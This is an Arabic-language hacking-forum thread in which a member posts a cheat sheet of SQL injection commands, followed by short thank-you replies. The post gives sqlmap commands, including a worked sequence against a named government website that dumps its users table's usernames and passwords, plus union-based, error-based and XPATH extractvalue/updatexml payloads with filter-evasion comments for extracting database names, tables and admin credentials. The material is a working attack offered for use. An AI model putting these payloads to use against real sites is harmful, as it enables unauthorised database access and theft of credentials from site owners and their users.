1. أهلا وسهلاً بكم في :: IQ-TeaM FORUM :: .
    إذا كانت هذه الزيارة الأولى أو لديك الرغبة بالانضمام لأعضاء شبكة عراق تيم فيجب الاطلاع على خصوصية الشبكه فربما بقائك زائر افضل لك من الانضمام بحيث أن قوانين شبكة عراق تيم لا تتناسب مع اهتماماتك .
    • للأطلاع على الخصوصية وسياسة الاستخدام - التفاصيل
    • بعد الاطلاع على سياسة الموقع وقوانين شبكة عراق تيم يمكنك التسجيل معنا - تسجيل عضو جديد
    إستبعاد الملاحظة
  2. الملاحظات
    عزيزي زائر تم اطلاق الموقع الرسمي لبرنامج الاختراق Spy-Note
    إستبعاد الملاحظة
حالة الموضوع:
مغلق
  1. Injection
    rank
    Developer

    عضو منذ:
    ‏28 يوليو 2012
    عدد المشاركات:
    21
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    15
    الوظيفة:
    *******
    الإقامة:
    iq-t34m
    نظام التشغيل:
    Linux
    [​IMG]

    السلام عليكم ورحمة الله تعالى وبركاته

    اقدم لكم بعض الأوامر المهمه
    الآوامر

    1 - Sqlmap
    2 - Sqlmap post
    3 - union based
    4 - Error Based
    5 - XPATH extractvalue
    6 - XPATH UpdateXML


    [​IMG]
    نبدأ على بركة الله
    :

    1 - Sqlmap

    كود PHP:
    لاستخراج قواعد البيانات :

    python sqlmap.py -[TARGET] --dbs

    \\\\\\\///////

    لاستخراج الجداول من قاعدة بيانات :

    python sqlmap.py -[TARGET] -[DATABASE] --tables

    \\\\\\\///////

    لاستخراج الاعمدة من الجدول :

    python sqlmap.py -[TARGET] -[DATABASE] -[TABLE] --columns

    \\\\\\\///////

    لاستخراج البيانات من الاعمدة :

    python sqlmap.py -[TARGET] -[DATABASE] -[TABLE] -[Col1,Col2,Col3] --dump
    [​IMG]

    2 - Sqlmap post

    كود PHP:
    sqlmap.py -"http://www.nlm.gov.mm/index.php?optio" --data="name=cloudx&email=cloudx&Submit=*Submit&option=com_ccnewsletter&task=addS*ubscriber" -p email --dbs
    ---------------------
    sqlmap.py -"http://www.nlm.gov.mm/index.php?optio" --data="name=cloudx&email=cloudx&Submit=*Submit&option=com_ccnewsletter&task=addS*ubscriber" -p email -D 713893_justnation --tables
    ---------------------
    sqlmap.py -"http://www.nlm.gov.mm/index.php?optio" --data="name=cloudx&email=cloudx&Submit=*Submit&option=com_ccnewsletter&task=addS*ubscriber" -p email -D 713893_justnation -T jos_users --columns
    ---------------------
    sqlmap.py -"http://www.nlm.gov.mm/index.php?optio" --data="name=cloudx&email=cloudx&Submit=*Submit&option=com_ccnewsletter&task=addS*ubscriber" -p email -D 713893_justnation -T jos_users -C username,password --dump
    [​IMG]

    3 - union based

    كود PHP:
    استخراج عدد الاعمدة :

    +
    /*!order+by*/+NUMBER--

    استخراج العمود المصاب :

    /**/union/*!50000select*/+NUM,NUM,NUM--

    استخراج اصدار القاعدة :

    /**/union/*!50000select*/+1,/*!version()*/,3,4,5,6,7,8--

    اصدار اسم القاعدة :

    /**/union/*!50000select*/ 1,/*!database()*/,3,4,5,6,7,8--

    استخراج الجداول :

    group_concat(table_name)

    +
    from+information_schema.tables+where+table_schema=database()--

    استخراج الاعمدة :

    group_concat(column_name)

    +
    from+information_schema.columns+where+table_name=0xTABLE_HEX

    تشفير الجدول بالهيكس 
    http://www.waraxe.us/sql-char-encoder.html

    استخراج البيانات :

    +
    group_concat(COLUMNS)

    +
    from+TABLE_NAME
    [​IMG]

    4 - Error Based

    كود PHP:
    اصدار القاعدة :

    or 
    1 group by concat_ws(0x3a,version(),floor(rand(0)*2)) having min(0) or 1--


    ============

    قاعدة البيانات :

    and (
    select 1 from (select count(*),concat((select(select concat(cast(database() as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

    ===========

    استخراج الجداول :

    and (
    select 1 from (select count(*),concat((select(select concat(cast(table_name as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

    نقوم بالتلاعب بـ limit للوصول الى الجدول المطلوب
    ===========

    استخراج الاعمدة :

    and (
    select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0xTABLENAMEHERE limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

    ملاحظة ضروري تشفير الجداول بالهيكس :

    http://www.waraxe.us/sql-char-encoder.html

    نتلاعب بالـ limit للوصول الى الاعمدة المطلوبة
    ==========

    استخراج البيانات :

    and (
    select 1 from (select count(*),concat((select(select concat(cast(concat(admin_NAME,0x7e,admin_PWD) as char),0x7e)) from Ignotus_1.tbl_userADMINS limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

    نتلاعب بـ limit للوصول الى كافة البيانات

    Ignotus_1
    .tbl_userADMINS

    مكان Ignotus_1 
    نضع اسم قاعدة البيانات
    مكان tbl_userADMINS 
    نضع اسم الجدول

    [​IMG]

    5 -XPATH extractvalue

    كود PHP:
    اصدار القاعدة :

    +and+
    extractvalue(rand(),concat(0x7e,version()))--

    -----------------------
    قاعدة البيانات :

    +and+
    extractvalue(rand(),concat(0x7e,database()))--

    -----------------------

    الجداول :

    +and+
    extractvalue(rand(),concat(0x7e,(select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1)))--

    -----------------------

    الاعمدة :

    +and+
    extractvalue(rand(),concat(0x7e,(select+column_name+from+information_schema.columns+where+table_name=TABLE_HEX+limit+0,1)))--  

    *
    تشفير الجدول بالهيكس

    http
    ://www.waraxe.us/sql-char-encoder.html

    -----------------------

    البيانات :

    +and+
    extractvalue(rand(),concat(0x7e,(select+concat(name,0x7e,password)+from+administrator_account+limit+0,1)))--
    [​IMG]

    6 - XPATH UpdateXML

    كود PHP:
    استخراج اصدار قاعدة البيانات :

    +and+
    updatexml(0x7e,concat(0x7e,(version())),0)--

    ------------------------

    استخراج قاعدة البيانات :

    +and+
    updatexml(0x7e,concat(0x7e,(database())),0)--

    ------------------------

    استخراج الجداول :

    +and+
    updatexml(0x7e,concat(0x7e,((select+concat(table_name)+from+information_schema.tables+where+table_schema=database()+limit+0,1))),0)--  

    نتلاعب بالـ limit للوصول الى الجدول المطلوب !

    ------------------------

    استخراج الاعمدة :

    +and+
    updatexml(0x7e,concat(0x7e,((select+concat(column_name)+from+information_schema.columns+where+table_name=TABLE_HEX+limit+0,1))),0)--  

    تشفير الجدول بالهيكس

    http
    ://www.waraxe.us/sql-char-encoder.html

    نتلاعب بالـ limit للوصول للاعمدة المطلوبة !

    -----------------------

    استخراج البيانات :

    +and+
    updatexml(0x7e,concat(0x7e,((select+concat(column,0x7e,column)+from+table+limit+0,1))),0)--

    [​IMG]

    بالتوفيق لكم اخواني :{y.}
     
    جاري تحميل الصفحة...
  2. Đѓ.Đ4řķ
    rank
    Developer

    عضو منذ:
    ‏17 ديسمبر 2011
    عدد المشاركات:
    44
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    20
    الإقامة:
    .♥ آلسعودية ♥.
    رد: أهم اوامر الحقن

    بارك الله فيك وجزاك خير الجزاء
     
  3. нάсќɇя
    rankrank
    Developer

    عضو منذ:
    ‏17 ديسمبر 2011
    عدد المشاركات:
    52
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    20
    الإقامة:
    فيـ قلبكـ
    اللغة البرمجية:
    Ruby
    رد: أهم اوامر الحقن

    شكرا لك ياغالي بارك الله فيك​
     
  4. كراش المحارب
    DeveloPer Plus

    عضو منذ:
    ‏26 ديسمبر 2012
    عدد المشاركات:
    82
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    30
    الإقامة:
    ksa
    رد: أهم اوامر الحقن

    تسلم أيدك يا بطل &:"
     
  5. El Mejor
    rankrank
    Developer

    عضو منذ:
    ‏26 ديسمبر 2011
    عدد المشاركات:
    70
    الإعجابات المتلقاة:
    3
    نقاط الجائزة:
    30
    الوظيفة:
    Hacker
    الإقامة:
    المــــــغــــــرب
    رد: أهم اوامر الحقن

    بطل الله يعطيك العافيه​
     
  6. jőŐőķєя
    rank
    Developer

    عضو منذ:
    ‏9 ديسمبر 2011
    عدد المشاركات:
    49
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    20
    الوظيفة:
    طآلب , ثآنوي ..●
    الإقامة:
    في عالم لا يسكنه غيريُ
    نظام التشغيل:
    Linux
    رد: أهم اوامر الحقن

    سلمت يداك على الطرح الراقي أخي

    ودي وإحترامي لك :{8}:​
     
  7. D 1 r k
    DeveloPer Plus

    عضو منذ:
    ‏9 ابريل 2012
    عدد المشاركات:
    136
    الإعجابات المتلقاة:
    5
    نقاط الجائزة:
    50
    الوظيفة:
    Currently Student
    الإقامة:
    United States
    رد: أهم اوامر الحقن

    بطل حبيبي واصل تفوقك :ُok:ٌ
     
  8. ★ قبعة القش ★
    V • I • P

    عضو منذ:
    ‏10 مايو 2014
    عدد المشاركات:
    303
    الإعجابات المتلقاة:
    6
    نقاط الجائزة:
    50
    نظام التشغيل:
    windows 7
    اللغة البرمجية:
    Visual Basic
    Facebook:
    YouTube:
    رد: أهم اوامر الحقن

    شرح جميل و معلومات قيمة تسلم إيدك )5:")5:")5:"

    تسلم إيدك حبيبي )5:")5:":{7}::{7}:
     
  9. صدام السقاف
    ExpErt DeveloPer

    عضو منذ:
    ‏11 يونيو 2014
    عدد المشاركات:
    219
    الإعجابات المتلقاة:
    7
    نقاط الجائزة:
    50
    نظام التشغيل:
    windows xp
    اللغة البرمجية:
    Perl
    Facebook:
    رد: أهم اوامر الحقن

    بارك الله فيك اخى الكريم فعلاً اوامر وشرح وافي وكافي ماقصرت اخى الكريم
     
الوسوم:
حالة الموضوع:
مغلق

مشاركة هذه الصفحة

جاري تحميل الصفحة...